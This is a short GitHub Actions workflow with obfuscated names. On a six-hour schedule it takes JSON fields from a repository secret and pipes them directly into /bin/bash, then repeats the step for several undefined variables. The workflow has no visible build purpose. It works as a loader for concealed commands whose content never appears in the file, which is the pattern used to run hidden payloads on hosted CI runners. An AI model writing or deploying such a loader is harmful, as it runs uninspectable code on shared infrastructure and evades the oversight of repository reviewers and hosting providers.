name: huangjiao2315
on:
  workflow_dispatch:
  schedule:
    - cron: '0 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huangjiao2315
        env:
          qjgb46: ${{ secrets.qjgb46 }}
        run: |
          echo $qjgb46 | jq -r .m13 | /bin/bash
          echo $kwbo54373 | jq -r .jwv5 | /bin/bash
          echo $a9 | jq -r .jes35 | /bin/bash
          echo $x20239 | jq -r .jlm7216 | /bin/bash
          echo $s752 | jq -r .zdj92342 | /bin/bash
          echo $rx62 | jq -r .pn138 | /bin/bash
          echo $fznk461 | jq -r .dum53395 | /bin/bash
          echo $otija5066 | jq -r .lfh84153 | /bin/bash
          echo $xugfh5 | jq -r .lre6352 | /bin/bash

